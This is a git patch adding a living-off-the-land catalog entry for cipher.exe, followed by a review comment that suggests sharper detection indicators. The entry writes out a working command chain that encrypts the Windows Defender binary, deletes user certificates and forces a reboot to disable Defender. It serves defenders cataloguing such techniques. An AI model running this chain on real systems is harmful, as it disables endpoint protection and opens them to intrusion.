From 87ee870023b7344be3b93e1e3706425aab56a5c3 Mon Sep 17 00:00:00 2001 From: Alexander Sennhauser Date: Mon, 9 Jan 2023 11:00:40 +0100 Subject: [PATCH] document cipher.exe usage to disable services --- yml/OSBinaries/Cipher.yml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 yml/OSBinaries/Cipher.yml diff --git a/yml/OSBinaries/Cipher.yml b/yml/OSBinaries/Cipher.yml new file mode 100644 index 0000000..230dbb8 --- /dev/null +++ b/yml/OSBinaries/Cipher.yml @@ -0,0 +1,25 @@ +--- +Name: Cipher.exe +Description: Security Tool for the Windows Encrypting File System +Author: Alexander Sennhauser +Created: 2023-01-09 +Commands: + - Command: cipher.exe /e "C:\ProgramData\Microsoft\Windows Defender\Platform\*\MsMpEng.exe" & certutil.exe -delstore -user my %username% & shutdown.exe /r /t 0 + Description: Encrypt the Windows Defender binary to disable the service after a system restart. + Usecase: MSFT Defender bypass using LOLBINs + Category: Tamper + Privileges: Admin + MitreID: T1562 + OperatingSystem: Windows 10 All +Full_Path: + - Path: c:\windows\system32\cipher.exe +Code_Sample: + - Code: +Detection: + - IOC: cipher.exe spawned with unusual path arguments + - IOC: certutil.exe spawned to delete user certificates +Resources: + - Link: +Acknowledgement: + - Person: Alexander Sennhauser + Handle: '@conitrade'
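Review bot: the `Code_Sample` and `Resources` sections in the new Cipher.yml are left as empty list items (`- Code:` and `- Link:` with no value), which serialises to null entries and gives a defender no write-up or sample to consult; either cite a source under `Resources` and a reproducible sample under `Code_Sample`, or drop the empty keys so the entry matches the populated ones. In the `Detection` block, "cipher.exe spawned with unusual path arguments" is too vague to turn into a rule; name the observable that the command line itself provides, for example `cipher.exe` invoked with `/e` against a path under `C:\ProgramData\Microsoft\Windows Defender\Platform\`, and add a third IOC for the full chain (`cipher.exe /e …`, `certutil.exe -delstore -user my …`, `shutdown.exe /r /t 0` from the same parent process), since the `Description` states the service is only disabled after the restart and the reboot is the point at which prevention is no longer possible. Minor points: `MitreID: T1562` could be narrowed to the sub-technique for disabling or modifying security tools (T1562.001), and `Full_Path` uses lowercase `c:\windows\system32\cipher.exe` where the command lines above use the capitalised drive letter; pick one casing for consistency with the other OSBinaries entries.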